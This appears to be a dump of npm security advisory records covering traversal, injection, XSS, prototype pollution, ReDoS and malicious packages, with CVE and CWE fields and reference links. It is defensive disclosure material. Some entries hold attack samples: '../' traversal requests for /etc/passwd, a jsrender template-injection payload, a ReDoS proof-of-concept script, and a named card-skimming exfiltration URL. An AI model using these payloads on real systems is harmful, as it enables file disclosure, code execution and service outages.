{'https://nodesecurity.io/advisories/454', 'https://www.npmjs.com/advisories/454', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16183', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/iter-server'}
| null |
npm
|
GHSA-vcqg-cmv3-wj57
|
Directory Traversal in rtcmulticonnection-client
|
Affected versions of `rtcmulticonnection-client` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16125'}
|
2021-09-16T20:52:29Z
|
2018-07-23T22:48:49Z
|
HIGH
| null |
{'CWE-22', 'CWE-12'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16125', 'https://github.com/advisories/GHSA-vcqg-cmv3-wj57', 'https://github.com/muaz-khan/Reliable-Signaler', 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/rtcmulticonnection-client', 'https://www.npmjs.com/advisories/385', 'https://nodesecurity.io/advisories/385'}
| null |
npm
|
GHSA-h4j5-c7cj-74xg
|
Arbitrary Code Injection
|
This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.
|
{'CVE-2020-28502'}
|
2021-05-04T18:02:15Z
|
2021-05-04T18:02:34Z
|
HIGH
| null |
{'CWE-94'}
|
{'https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js%23L480', 'https://github.com/mjwwit/node-XMLHttpRequest/commit/ee1e81fc67729c7c0eba5537ed7fe1e30a6b3291', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1082937', 'https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js#L480', 'https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUESTSSL-1082936', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1082938', 'https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28502', 'https://github.com/mjwwit/node-XMLHttpRequest/blob/ae38832a0f1347c5e96dda665402509a3458e302/lib/XMLHttpRequest.js#L531', 'https://github.com/driverdan/node-XMLHttpRequest/commit/983cfc244c7567ad6a59e366e55a8037e0497fe6'}
| null |
npm
|
GHSA-8fv7-vm2p-5495
|
Directory Traversal in welcomyzt
|
`welcomyzt` is a simple file server.
`welcomyzt` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url.
Example Request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host: localhost
```
and server Response:
```
HTTP/1.1 200 OK
Date: Thu, 04 May 2017 23:59:18 GMT
Connection: keep-alive
Transfer-Encoding: chunked
{contents of /etc/passwd}
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16123'}
|
2020-08-31T18:21:24Z
|
2020-09-01T17:23:53Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://nodesecurity.io/advisories/388', 'https://www.npmjs.com/advisories/388', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16123', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/pooledwebsocket'}
| null |
npm
|
GHSA-5mm9-55c9-p5r7
|
Malicious Package in mogoose
|
This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
## Recommendation
Remove the package from your environment. There are no indications of further compromise.
| null |
2021-09-30T20:26:48Z
|
2020-09-03T19:53:31Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1135'}
| null |
npm
|
GHSA-r87w-47m8-22w3
|
Template Injection in jsrender
|
Affected versions of `jsrender` are susceptible to a remote code execution vulnerability when used with server delivered client-side tempates which dynamically embed user input.
## Proof of Concept
```
<POC-REQUEST>
{{for ~x!=1?(constructor.constructor("return arguments.callee.caller")()):~y(10)}}
{{:#data}}
{{/for}}
</POC-REQUEST>
```
```
<POC-RESPONSE>
function anonymous(data,view,j,u) { // template var v,t=j._tag,ret="" +t("for",view,this,[ {view:view,tmpl:1, params:{args:['~x!=1?(constructor.constructor(\"return arguments.callee.caller\")()):~y(10)']}, args:[view.hlp("x")!=1?(data.constructor.constructor("return arguments.callee.caller")()):view.hlp("y")(10)], props:{}}]); return ret; }
<POC-RESPONSE>
```
## Recommendation
Update to version 0.9.74 or later.
|
{'CVE-2016-3942'}
|
2021-09-23T21:26:38Z
|
2020-09-01T15:24:24Z
|
MODERATE
| null |
{'CWE-94'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-3942', 'https://www.npmjs.com/advisories/97', 'https://github.com/BorisMoore/jsrender/commit/f984e139deb0a7648d5b543860ec652c21f6dcf6', 'https://github.com/BorisMoore/jsrender', 'https://snyk.io/vuln/SNYK-DOTNET-JSRENDER-60173'}
| null |
npm
|
GHSA-j4rw-x3vg-c8r7
|
Prototype Pollution in node-oojs
|
All versions of package node-oojs up to and including version 1.4.0 are vulnerable to Prototype Pollution via the setPath function.
|
{'CVE-2020-7721'}
|
2021-05-05T18:40:32Z
|
2021-05-06T18:12:37Z
|
CRITICAL
| null |
{'CWE-1321'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7721', 'https://snyk.io/vuln/SNYK-JS-NODEOOJS-598678'}
| null |
npm
|
GHSA-m8cr-q935-8j67
|
Path Traversal in buttle
|
All versions of `buttle` are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths when fetching files.
## Recommendation
No fix is currently available. Consider using an alternative module until a fix is made available.
|
{'CVE-2018-3766'}
|
2021-01-08T18:29:58Z
|
2018-09-18T13:47:57Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2018-3766', 'https://github.com/advisories/GHSA-m8cr-q935-8j67', 'https://www.npmjs.com/advisories/990', 'https://hackerone.com/reports/358112'}
| null |
npm
|
GHSA-84cm-v6jp-gjmr
|
OS command injection in git-diff-apply
|
In "index.js" file line 240, the run command executes the git command with a user controlled variable called remoteUrl. This affects git-diff-apply all versions prior to 0.22.2.
|
{'CVE-2019-10776'}
|
2021-08-19T17:14:36Z
|
2020-02-14T23:09:24Z
|
CRITICAL
| null |
{'CWE-78'}
|
{'https://snyk.io/vuln/SNYK-JS-GITDIFFAPPLY-540774', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10776', 'https://github.com/kellyselden/git-diff-apply/commit/106d61d3ae723b4257c2a13e67b95eb40a27e0b5', 'https://snyk.io/vuln/SNYK-JS-GITDIFFAPPLY-540774,'}
| null |
npm
|
GHSA-v5v3-8jqf-vg27
|
Downloads Resources over HTTP in aerospike
|
Affected versions of `aerospike` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `aerospike`.
## Recommendation
Update to version 2.4.2 or later
|
{'CVE-2016-10558'}
|
2021-01-08T01:57:37Z
|
2019-02-18T23:54:22Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://www.npmjs.com/advisories/167', 'https://nodesecurity.io/advisories/167', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10558', 'https://github.com/advisories/GHSA-v5v3-8jqf-vg27'}
| null |
npm
|
GHSA-hg7w-2pf7-mxm2
|
Malicious Package in wbe3
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-04T16:37:42Z
|
2020-09-03T17:02:31Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1414'}
| null |
npm
|
GHSA-72p5-2r6g-fm6v
|
Moderate severity vulnerability that affects total.js
|
Total.js CMS 12.0.0 has XSS related to themes/admin/views/index.html (item.message) and themes/admin/public/ui.js (column.format).
|
{'CVE-2019-10260'}
|
2021-06-11T14:16:33Z
|
2019-04-02T15:46:52Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-72p5-2r6g-fm6v', 'https://github.com/totaljs/cms/commit/75205f93009db3cf8c0b0f4f1fc8ab82d70da8ad', 'https://github.com/totaljs/cms/commit/8b9d7dada998c08d172481d9f0fc0397c4b3c78d', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10260'}
| null |
npm
|
GHSA-q4h9-46xg-m3x9
|
UUPSUpgradeable vulnerability in @openzeppelin/contracts-upgradeable
|
### Impact
Upgradeable contracts using `UUPSUpgradeable` may be vulnerable to an attack affecting uninitialized implementation contracts. We will update this advisory with more information soon.
### Patches
A fix is included in version 4.3.2 of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`.
### Workarounds
Initialize implementation contracts using `UUPSUpgradeable` by invoking the initializer function (usually called `initialize`). An example is provided [in the forum](https://forum.openzeppelin.com/t/security-advisory-initialize-uups-implementation-contracts/15301).
### References
A post-mortem will be published in a few days in the [OpenZeppelin Forum](https://forum.openzeppelin.com/).
### For more information
If you have any questions or comments about this advisory, or need assistance executing the mitigation, email us at security@openzeppelin.com.
| null |
2021-09-14T22:17:40Z
|
2021-09-15T20:22:13Z
|
CRITICAL
| null | null |
{'https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/security/advisories/GHSA-q4h9-46xg-m3x9', 'https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable'}
| null |
npm
|
GHSA-vp93-gcx5-4w52
|
Cross-Site Scripting in swagger-ui
|
Versions of `swagger-ui` prior to 2.2.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize JSON schemas, allowing attackers to execute arbitrary JavaScript using `<script>` tags in the method descriptions.
## Recommendation
Upgrade to version 2.2.1 or later.
| null |
2021-09-28T17:00:47Z
|
2020-09-11T21:21:19Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/swagger-api/swagger-ui/issues/1864', 'https://www.npmjs.com/advisories/986', 'https://github.com/swagger-api/swagger-ui'}
| null |
npm
|
GHSA-wqfc-cr59-h64p
|
Missing Encryption of Sensitive Data in yarn
|
Yarn before 1.17.3 is vulnerable to Missing Encryption of Sensitive Data due to HTTP URLs in lockfile causing unencrypted authentication data to be sent over the network.
|
{'CVE-2019-5448'}
|
2021-08-17T19:40:44Z
|
2019-07-31T04:22:15Z
|
HIGH
| null |
{'CWE-319', 'CWE-311'}
|
{'https://github.com/ChALkeR/notes/blob/master/Yarn-vuln.md', 'https://nvd.nist.gov/vuln/detail/CVE-2019-5448', 'https://hackerone.com/reports/640904', 'https://yarnpkg.com/blog/2019/07/12/recommended-security-update/'}
| null |
npm
|
GHSA-x2jc-pwfj-h9p3
|
SQL Injection in sequelize
|
Affected versions of `sequelize` use MySQL's backslash-based escape syntax when connecting to SQLite, despite the fact that SQLite uses PostgreSQL's escape syntax, which can result in a SQL Injection vulnerability.
## Recommendation
Update to version 1.7.0-alpha3 or later.
|
{'CVE-2016-10554'}
|
2020-08-31T18:11:14Z
|
2019-02-18T23:54:28Z
|
MODERATE
| null |
{'CWE-89'}
|
{'https://nodesecurity.io/advisories/113', 'https://github.com/advisories/GHSA-x2jc-pwfj-h9p3', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10554', 'https://www.npmjs.com/advisories/113', 'https://github.com/sequelize/sequelize/commit/c876192aa6ce1f67e22b26a4d175b8478615f42d'}
| null |
npm
|
GHSA-6g33-f262-xjp4
|
Cryptographically Weak PRNG in randomatic
|
Affected versions of `randomatic` generate random values using a cryptographically weak psuedo-random number generator. This may result in predictable values instead of random values as intended.
## Recommendation
Update to version 3.0.0 or later.
|
{'CVE-2017-16028'}
|
2021-01-08T20:58:33Z
|
2018-10-09T00:57:21Z
|
LOW
| null |
{'CWE-330'}
|
{'https://github.com/tableflip/react-native-meteor-oauth/blob/a7eb738b74c469f5db20296b44b7cae4e2337435/src/meteor-oauth.js#L66', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16028', 'https://github.com/jonschlinkert/randomatic/commit/4a526959b3a246ae8e4a82f9c182180907227fe1#diff-b9cfc7f2cdf78a7f4b91a753d10865a2', 'https://github.com/advisories/GHSA-6g33-f262-xjp4', 'https://nodesecurity.io/advisories/157', 'https://www.npmjs.com/advisories/157'}
| null |
npm
|
GHSA-mqgv-67vx-g4m5
|
Prototype Pollution in js-data
|
All versions of package js-data prior to 3.0.10 are vulnerable to Prototype Pollution via the deepFillIn function.
|
{'CVE-2020-28442'}
|
2022-02-09T22:45:52Z
|
2022-02-09T22:45:52Z
|
HIGH
| null |
{'CWE-1321'}
|
{'https://snyk.io/vuln/SNYK-JS-JSDATA-1023655', 'https://github.com/js-data/js-data/pull/574', 'https://github.com/js-data/js-data/commit/2d9eed5d3e9710d7e7fecc6f6437c39fe73a4097', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28442'}
| null |
npm
|
GHSA-22q9-hqm5-mhmc
|
Cross-Site Scripting in swagger-ui
|
Versions of `swagger-ui` prior to 2.2.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to encode output in GET requests. The request is meant to respond with Content-Type `application/json` which does not trigger the vulnerability but if the web server changes the header to `text/html` it may allow attackers to execute arbitrary JavaScript.
## Recommendation
Upgrade to version 2.2.1 or later.
| null |
2021-09-28T17:01:08Z
|
2020-09-11T21:22:24Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://www.npmjs.com/advisories/987', 'https://github.com/swagger-api/swagger-ui', 'https://github.com/swagger-api/swagger-ui/issues/1154'}
| null |
npm
|
GHSA-fx6f-fpfv-5hmc
|
Malicious Package in uploader-plugin
|
Version 1.0.2 of `uploader-plugin` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
| null |
2020-08-31T18:47:14Z
|
2020-09-03T19:10:12Z
|
CRITICAL
| null | null |
{'https://www.npmjs.com/advisories/1100'}
| null |
npm
|
GHSA-m794-qv59-gj7c
|
Malicious Package in signqle
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-04T15:43:26Z
|
2020-09-03T17:03:22Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1410'}
| null |
npm
|
GHSA-747p-jfqv-f43r
|
Downloads Resources over HTTP in mystem3
|
Affected versions of `mystem3` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `mystem3`.
## Recommendation
Update to version 1.0.8 or later.
|
{'CVE-2016-10626'}
|
2021-06-11T14:04:48Z
|
2019-02-18T23:47:26Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://nodesecurity.io/advisories/229', 'https://www.npmjs.com/advisories/229', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10626', 'https://github.com/advisories/GHSA-747p-jfqv-f43r', 'https://github.com/koorchik/node-mystem3/commit/4bd31c0e0110afc327c414d7ebfc2ffe738cbad2'}
| null |
npm
|
GHSA-m34x-wgrh-g897
|
Directory traversal vulnerability in Next.js
|
Next.js 4 before 4.2.3 has Directory Traversal under the `/_next` request namespace.
|
{'CVE-2018-6184'}
|
2022-04-28T20:13:30Z
|
2018-01-24T19:38:52Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2018-6184', 'https://github.com/zeit/next.js', 'https://github.com/advisories/GHSA-m34x-wgrh-g897', 'https://github.com/vercel/next.js/releases/tag/4.2.3'}
| null |
npm
|
GHSA-f5c9-x9j6-87qp
|
Prototype pollution in dotty
|
Prototype pollution vulnerability in 'dotty' before version 0.1.1 allows attackers to cause a denial of service and may lead to remote code execution.
|
{'CVE-2021-25912'}
|
2021-02-03T07:41:22Z
|
2021-02-05T20:43:08Z
|
MODERATE
| null |
{'CWE-400'}
|
{'https://www.npmjs.com/package/dotty', 'https://github.com/deoxxa/dotty/commit/cd997d37917186c131be71501a698803f2b7ebdb', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25912', 'https://nvd.nist.gov/vuln/detail/CVE-2021-25912'}
| null |
npm
|
GHSA-49wp-qq6x-g2rf
|
Cross-site Request Forgery in fastify-csrf
|
The package fastify-csrf before 3.0.0 has a set of issues that affect its ability to do CSRF protection.
1. The generated cookie used insecure defaults, and did not have the httpOnly flag on: `cookieOpts: { path: '/', sameSite: true }`
2. The CSRF token was available in the GET query parameter
|
{'CVE-2020-28482'}
|
2021-01-20T19:49:01Z
|
2021-01-20T21:30:34Z
|
MODERATE
| null |
{'CWE-352'}
|
{'https://www.npmjs.com/package/fastify-csrf', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28482', 'https://github.com/fastify/fastify-csrf/pull/26', 'https://snyk.io/vuln/SNYK-JS-FASTIFYCSRF-1062044', 'https://github.com/fastify/fastify-csrf/commit/3c9de36e9e73ce0eda9207f84f2ac0243e1f5253'}
| null |
npm
|
GHSA-rgx6-rjj4-c388
|
Cross-site Scripting in ckeditor4
|
A cross-site scripting (XSS) vulnerability in the HTML Data Processor in CKEditor 4 4.14.0 through 4.16.x before 4.16.1 allows remote attackers to inject executable JavaScript code through a crafted comment because --!> is mishandled.
|
{'CVE-2021-33829'}
|
2021-11-18T15:22:36Z
|
2021-06-21T17:16:42Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://www.drupal.org/sa-core-2021-003', 'https://ckeditor.com/blog/ckeditor-4.16.1-with-accessibility-enhancements/#improvements-for-comments-in-html-parser', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33829', 'https://www.npmjs.com/package/ckeditor4', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/', 'https://lists.debian.org/debian-lts-announce/2021/11/msg00007.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/', 'https://github.com/ckeditor/ckeditor4'}
| null |
npm
|
GHSA-xp63-6vf5-xf3v
|
Command injection in codecov (npm package)
|
### Impact
The `upload` method has a command injection vulnerability. Clients of the `codecov-node` library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
A similar CVE was issued: [CVE-2020-7597](https://github.com/advisories/GHSA-5q88-cjfq-g2mh), but the fix was incomplete. It only blocked `&`, and command injection is still possible using backticks instead to bypass the sanitizer.
We have written a [CodeQL](https://codeql.com) query, which automatically detects this vulnerability. You can see the results of the query on the `codecov-node` project [here](https://lgtm.com/query/7714424068617023832/).
### Patches
This has been patched in version 3.7.1
### Workarounds
None, however, the attack surface is low in this case. Particularly in the standard use of codecov, where the module is used directly in a build pipeline, not built against as a library in another application that may supply malicious input and perform command injection.
### References
* [CVE-2020-7597](https://github.com/advisories/GHSA-5q88-cjfq-g2mh)
### For more information
If you have any questions or comments about this advisory:
* Contact us via our [Security Email](mailto:security@codecov.io)
|
{'CVE-2020-15123'}
|
2021-01-07T23:47:13Z
|
2020-07-20T17:20:20Z
|
MODERATE
| null |
{'CWE-78'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-15123', 'https://github.com/codecov/codecov-node/commit/c0711c656686e902af2cd92d6aecc8074de4d83d', 'https://github.com/codecov/codecov-node/pull/180', 'https://github.com/codecov/codecov-node/security/advisories/GHSA-xp63-6vf5-xf3v', 'https://lgtm.com/query/7714424068617023832', 'https://github.com/advisories/GHSA-5q88-cjfq-g2mh'}
| null |
npm
|
GHSA-qhv9-728r-6jqg
|
ReDoS via long string of semicolons in tough-cookie
|
Affected versions of `tough-cookie` may be vulnerable to regular expression denial of service when long strings of semicolons exist in the `Set-Cookie` header.
## Recommendation
Update to version 2.3.0 or later.
|
{'CVE-2016-1000232'}
|
2021-09-16T19:58:53Z
|
2018-10-10T18:57:02Z
|
MODERATE
| null |
{'CWE-20'}
|
{'https://github.com/salesforce/tough-cookie/commit/615627206357d997d5e6ff9da158997de05235ae', 'https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-api-connect-is-affected-by-node-js-tough-cookie-module-vulnerability-to-a-denial-of-service-cve-2016-1000232/', 'https://github.com/salesforce/tough-cookie', 'https://github.com/salesforce/tough-cookie/commit/e4fc2e0f9ee1b7a818d68f0ac7ea696f377b1534', 'https://access.redhat.com/errata/RHSA-2017:2912', 'https://access.redhat.com/security/cve/cve-2016-1000232', 'https://github.com/advisories/GHSA-qhv9-728r-6jqg', 'https://www.npmjs.com/advisories/130', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000232', 'https://access.redhat.com/errata/RHSA-2016:2101'}
| null |
npm
|
GHSA-6q4w-3wp4-q5wf
|
Denial of Service in get-ip-range
|
The get-ip-range package before 4.0.0 for Node.js is vulnerable to denial of service (DoS) if the range is untrusted input. An attacker could send a large range (such as 128.0.0.0/1) that causes resource exhaustion. Update get-ip-range dependency to 4.0.0 or above.
|
{'CVE-2021-27191'}
|
2022-05-03T02:57:48Z
|
2021-04-13T15:15:57Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://security.netapp.com/advisory/ntap-20210319-0002/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27191', 'https://www.npmjs.com/package/get-ip-range', 'https://github.com/JoeScho/get-ip-range/commit/98ca22b815c77273cbab259811ab0976118e13b6', 'https://advisory.checkmarx.net/advisory/CX-2021-4304'}
| null |
npm
|
GHSA-xj62-87pg-vcv3
|
Regular Expression Denial of Service in jshamcrest
|
The `jshamcrest` package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in to the emailAddress validator.
## Proof of concept
```
var js = require('jshamcrest')
var emailAddress = new js.JsHamcrest.Matchers.emailAddress();
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=1;i<=10000000;i=i+1) {
console.log("COUNT: " + i);
var str = '66666666666666666666666666666@ffffffffffffffffffffffffffffffff.' + genstr(i, 'a') + '{'
console.log("LENGTH: " + str.length);
var start = process.hrtime();
emailAddress.matches(str)
var end = process.hrtime(start);
console.log(end);
}
```
### Results
It takes about 116 characters to get a 1.6 second event loop block.
```
[ 1, 633084590 ]
COUNT: 51
LENGTH: 116
```
# Timeline
- October 25, 2015 - Vulnerability Identified
- October 25, 2015 - Maintainers notified (no response)
## Recommendation
The `jshamcrest` package currently has no patched versions available.
At this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are [multiple modules fitting this criteria available on npm.](https://www.npmjs.com/search?q=validator).
|
{'CVE-2016-10521'}
|
2021-01-08T00:03:52Z
|
2019-02-18T23:38:51Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://github.com/advisories/GHSA-xj62-87pg-vcv3', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10521', 'https://www.npmjs.com/advisories/53', 'https://nodesecurity.io/advisories/53'}
| null |
npm
|
GHSA-7qg7-6g3g-8vxg
|
Malicious Package in bwffer-xor
|
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-09-30T15:46:17Z
|
2020-09-03T22:46:25Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1269'}
| null |
npm
|
GHSA-hx78-272p-mqqh
|
Authorization Bypass in graphql-shield
|
Versions of `graphql-shield` prior to 6.0.6 are vulnerable to an Authorization Bypass. The rule caching option `no_cache` relies on keys generated by cryptographically insecure functions, which may cause rules to be incorrectly cached. This allows attackers to access information they should not have access to in case of a key collision.
## Recommendation
Upgrade to version 6.0.6 or later.
| null |
2020-08-31T18:47:59Z
|
2020-09-03T19:21:11Z
|
LOW
| null |
{'CWE-285'}
|
{'https://www.npmjs.com/advisories/1121'}
| null |
npm
|
GHSA-r96p-v3cr-gfv8
|
Cross-site Scripting (XSS) in @scullyio/scully
|
This affects the package @scullyio/scully before 1.0.9. The transfer state is serialised with the JSON.stringify() function and then written into the HTML page.
|
{'CVE-2020-28470'}
|
2021-07-29T20:42:20Z
|
2021-04-13T15:28:01Z
|
HIGH
| null |
{'CWE-79'}
|
{'https://github.com/scullyio/scully/pull/1182', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28470', 'https://snyk.io/vuln/SNYK-JS-SCULLYIOSCULLY-1055829'}
| null |
npm
|
GHSA-5vm8-hhgr-jcjp
|
Cross-site scripting vulnerability in TinyMCE
|
### Impact
A cross-site scripting (XSS) vulnerability was discovered in the URL sanitization logic of the core parser for `form` elements. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor using the clipboard or APIs, and then submitting the form. However, as TinyMCE does not allow forms to be submitted while editing, the vulnerability could only be triggered when the content was previewed or rendered outside of the editor. This impacts all users who are using TinyMCE 5.7.0 or lower.
### Patches
This vulnerability has been patched in TinyMCE 5.7.1 by improved URL sanitization logic.
### Workarounds
To work around this vulnerability, either:
- Upgrade to TinyMCE 5.7.1 or higher
- Manually sanitize `form` URL attributes using a [TinyMCE node filter](https://www.tiny.cloud/docs/api/tinymce.html/tinymce.html.domparser/#addnodefilter).
- Disable `form` elements in your content using the [invalid_elements](https://www.tiny.cloud/docs/configure/content-filtering/#invalid_elements) setting.
#### Example: Sanitizing using a node filter
```js
editor.parser.addNodeFilter('form', function(nodes) {
nodes.forEach(function(node) {
if (node.attributes) {
node.attributes.forEach(function(attr) {
var name = attr.name;
var value = attr.value;
// Sanitize the attribute value here or remove it entirely
var sanitizedValue = ...;
node.attr(name, santizedValue);
});
}
});
});
```
#### Example: Using invalid_elements
```js
invalid_elements: 'form'
```
### Acknowledgements
Tiny Technologies would like to thank Mikhail Khramenkov at Solar Security Research Team for discovering this vulnerability.
### References
https://www.tiny.cloud/docs/release-notes/release-notes571/#securityfixes
### For more information
If you have any questions or comments about this advisory:
* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)
* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)
| null |
2021-05-27T21:29:43Z
|
2021-05-28T19:18:53Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/tinymce/tinymce/security/advisories/GHSA-5vm8-hhgr-jcjp'}
| null |
npm
|
GHSA-6g8v-hpgw-h2v7
|
Prototype pollution in gsap
|
There is a prototype pollution vulnerability in gsap which affects all versions before 3.6.0.
|
{'CVE-2020-28478'}
|
2021-01-20T05:34:02Z
|
2021-01-20T21:21:50Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://snyk.io/vuln/SNYK-JS-GSAP-1054614', 'https://github.com/greensock/GSAP/releases/tag/3.6.0', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28478', 'https://github.com/greensock/GSAP/blob/master/src/gsap-core.js#L150', 'https://github.com/greensock/GSAP/blob/master/src/gsap-core.js%23L147', 'https://www.npmjs.com/package/gsap/v/3.6.0'}
| null |
npm
|
GHSA-5gwh-g79j-vh4q
|
Command Injection in pdf-image
|
Versions of `pdf-image` before 2.0.0 are vulnerable to command injection. This vulnerability is exploitable if the attacker has control over the `pdfFilePath` variable passed into `pdf-image`.
## Recommendation
Update to version 2.0.0 or later.
|
{'CVE-2018-3757'}
|
2021-09-24T20:36:09Z
|
2020-09-01T20:44:52Z
|
CRITICAL
| null |
{'CWE-78'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2018-3757', 'https://hackerone.com/reports/340208', 'https://github.com/roest01/node-pdf-image', 'https://www.npmjs.com/advisories/670', 'https://github.com/roest01/node-pdf-image/commit/54679496a89738443917608c2bbe2f6e5dd20e83'}
| null |
npm
|
GHSA-x5rq-j2xg-h7qm
|
Regular Expression Denial of Service (ReDoS) in lodash
|
lodash prior to 4.7.11 is affected by: CWE-400: Uncontrolled Resource Consumption. The impact is: Denial of service. The component is: Date handler. The attack vector is: Attacker provides very long strings, which the library attempts to match using a regular expression. The fixed version is: 4.7.11.
|
{'CVE-2019-1010266'}
|
2022-03-09T22:54:28Z
|
2019-07-19T16:13:07Z
|
MODERATE
| null |
{'CWE-400'}
|
{'https://github.com/lodash/lodash/commit/5c08f18d365b64063bfbfa686cbb97cdd6267347', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1010266', 'https://github.com/lodash/lodash/wiki/Changelog', 'https://security.netapp.com/advisory/ntap-20190919-0004/', 'https://github.com/lodash/lodash/issues/3359', 'https://snyk.io/vuln/SNYK-JS-LODASH-73639'}
| null |
npm
|
GHSA-qjg4-w4c6-f6c6
|
Command injection in mversion
|
### Impact
This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.
### Patches
Patched by version 2.0.0. Previous releases are deprecated in npm.
### Workarounds
Make sure to escape git commit messages when using the commitMessage option for the update function.
|
{'CVE-2020-4059'}
|
2021-01-08T21:00:24Z
